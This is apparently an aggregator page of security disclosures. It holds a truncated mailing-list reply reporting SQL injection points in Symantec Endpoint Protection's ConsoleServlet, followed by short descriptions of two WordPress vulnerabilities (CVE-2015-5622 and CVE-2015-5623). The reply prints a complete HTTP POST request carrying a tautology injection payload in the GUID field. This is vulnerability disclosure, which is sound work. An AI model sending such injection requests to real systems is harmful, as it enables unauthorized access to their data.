Re: Symantec Endpoint Protection

Posted by Markus Wulftange on Aug 03

Hi Brandon,

we found two injection points. One in the BinaryFileHandler class:

POST /servlet/ConsoleServlet HTTP/1.1
Host: 192.168.40.133:8443
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Cookie: JSESSIONID=D739FA0884EB78B31B1D23AEA899C175

ActionType=BinaryFile&Action=EXISTS&GUID=0’or’1’=’1

And one in the ExpRecordHandler class:

POST /servlet/ConsoleServlet…

CVE-2015-5622 (wordpress)

Cross-site scripting (XSS) vulnerability in WordPress before 4.2.3 allows remote authenticated users to inject arbitrary web script or HTML by leveraging the Author or Contributor role to place a crafted shortcode inside an HTML element, related to wp-includes/kses.php and wp-includes/shortcodes.php.

CVE-2015-5623 (wordpress)

WordPress before 4.2.3 does not properly verify the edit_posts capability, which allows remote authenticated users to bypass intended access restrictions and create drafts by leveraging the Subscriber role, as demonstrated by a post-quickdraft-save action to wp-admin/post.php.